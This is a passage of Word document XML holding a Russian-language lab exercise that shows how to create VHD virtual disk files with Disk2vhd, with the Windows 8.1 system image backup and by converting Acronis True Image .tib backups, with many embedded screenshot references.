          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Задание </w:t>
      </w:r>
      <w:r w:rsidR="00B632E5" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создать файл VHD с помощью программы Disk2vhd v2.01</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ход работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Самый простой способ создания файла VHD, это использование утилиты Disk2vhd v2.01, она очень быстро создаст вам из обыкновенного физического жесткого диска файл виртуального диска VHD или более совершенного VHDX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Переходим по ссылке на официальный сайт Майкрософт</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="00B56D78" w:rsidP="005742B0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId396" w:history="1">
        <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:color w:val="auto"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://technet.microsoft.com/ru-ru/sysinternals/ee656415</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>жмем</w:t>
      </w:r>
      <w:r w:rsidR="005742B0" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Download Disk2vhd,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Программа скачивается в небольшом архиве, разархивируем его и запускаем Disk2vhd v2.01.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">В окне программы можете снять галочку с </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Vhdx</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">, это значит, что создавать мы будем простой формат виртуальных жестких дисков </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VHD</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> совместимый с Windows 7, если галочку не снимать. то мы создадим файл нового формата VHDX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>В левой части окна отмечаем галочками разделы жесткого диска конвертируемые в файл виртуального диска Vhd, а именно, диск C:\ с установленной Windows 8.1.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Даем имя будущему файлу ALEXPK.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Сохраним виртуальный файл на переносном винчестере USB буква диска (I:), так как на нем достаточно свободного места.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve">Жмем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Create</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t xml:space="preserve"> и начинается процесс создания виртуального диска VHD.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1578675" cy="1296000"/>
            <wp:effectExtent l="19050" t="0" r="2475" b="0"/>
            <wp:docPr id="273" name="Рисунок 109" descr="https://remontcompa.ru/uploads/posts/2015-09/14431164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remontcompa.ru/uploads/posts/2015-09/1443116402_1.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId397" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1579329" cy="1296537"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1449750" cy="1190160"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="274" name="Рисунок 110" descr="https://remontcompa.ru/uploads/posts/2015-09/144311636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remontcompa.ru/uploads/posts/2015-09/1443116365_2.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId398" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1449743" cy="1190155"/>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Файл создан.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2). Создаем файл VHD с помощью встроенного в Windows 8.1 средства создания резервного образа операционной системы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:t>Формат VHD всецело принадлежит Майрософт и встроенное в Windows 8.1 средство создания резервного образа операционной системы, создает эти самые образы, как раз в формате VHD.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Панель управления</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Система и безопасность</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>История файлов</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Резервная копия образа системы</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1403159" cy="1029600"/>
            <wp:effectExtent l="19050" t="0" r="6541" b="0"/>
            <wp:docPr id="275" name="Рисунок 112" descr="https://remontcompa.ru/uploads/posts/2015-09/1443117822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remontcompa.ru/uploads/posts/2015-09/1443117822_110.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId399" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1402662" cy="1029236"/>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Выбираем место сохранения резервного образа операционной системы. Далее</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1298550" cy="1208302"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="276" name="Рисунок 113" descr="https://remontcompa.ru/uploads/posts/2015-09/1443118045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remontcompa.ru/uploads/posts/2015-09/1443118045_111.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId400" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1301307" cy="1210867"/>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По умолчанию в образ включаются скрытый раздел с файлами загрузки Windows 8.1 и диск (C:). Далее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1269750" cy="1181503"/>
            <wp:effectExtent l="19050" t="0" r="6600" b="0"/>
            <wp:docPr id="277" name="Рисунок 114" descr="https://remontcompa.ru/uploads/posts/2015-09/1443118104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remontcompa.ru/uploads/posts/2015-09/1443118104_112.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId401" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1269681" cy="1181439"/>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 xml:space="preserve">Архивировать. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1168950" cy="1087708"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="278" name="Рисунок 115" descr="https://remontcompa.ru/uploads/posts/2015-09/1443118060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remontcompa.ru/uploads/posts/2015-09/1443118060_113.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId402" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1168965" cy="1087722"/>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 xml:space="preserve">Начинается процесс создания резервного образа, а точнее файла виртуального жесткого диска VHD. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1708950" cy="916695"/>
            <wp:effectExtent l="19050" t="0" r="5550" b="0"/>
            <wp:docPr id="279" name="Рисунок 116" descr="https://remontcompa.ru/uploads/posts/2015-09/1443121171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remontcompa.ru/uploads/posts/2015-09/1443121171_121.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId403" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1709721" cy="917108"/>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 xml:space="preserve">Резервный образ сохраняется в папке </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>WindowsImageBackup</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Имя пользователя</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Backup</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3). Как преобразовать формат .tib программы Acronis True Image в формат виртуальных жестких дисков VHD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Огромное количество пользователей каждый день создают резервные копии операционной системы в программе Acronis True Image, данная программа создает бэкапы Windows в формате .tib, но если вы захотите преобразовать его в формат виртуальных жестких дисков VHD, то такая возможность присутствует только в версиях Acronis True Image 2013, 2014, в последних версиях Acronis True Image 2015, 2016 данный функционал вырезан для облегчения программы. Я лично считаю, что зря, так как многие пользователи использовали данную функцию.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="005742B0">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Итак, если у вас установлена Acronis True Image 2013, 2014,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1682142" cy="1382400"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="280" name="Рисунок 119" descr="https://remontcompa.ru/uploads/posts/2015-09/1443121676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remontcompa.ru/uploads/posts/2015-09/1443121676_122.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId404" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1683479" cy="1383499"/>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rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">то запускаем программу и выбираем </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Инструменты и утилиты-&gt;Преобразовать резервную копию Acronis</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3399329" cy="2793600"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="281" name="Рисунок 120" descr="Как создать файл виртуального жёсткого диска VHD">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Как создать файл виртуального жёсткого диска VHD">
                      <a:hlinkClick r:id="rId405"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId406" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3405575" cy="2798733"/>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Выбираем необходимую резервную копию в формате .tib. Далее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2306550" cy="1954662"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="282" name="Рисунок 121" descr="https://remontcompa.ru/uploads/posts/2015-09/1443119142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remontcompa.ru/uploads/posts/2015-09/1443119142_116.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId407" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2307054" cy="1955090"/>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 xml:space="preserve">Выбираем место сохранения будущего файла VHD. Далее. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005742B0" w:rsidRPr="00617AC0" w:rsidRDefault="005742B0" w:rsidP="00714C54">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1975350" cy="1662110"/>
            <wp:effectExtent l="19050" t="0" r="5850" b="0"/>
            <wp:docPr id="283" name="Рисунок 122" descr="https://remontcompa.ru/uploads/posts/2015-09/1443119170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remontcompa.ru/uploads/posts/2015-09/1443119170_117.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
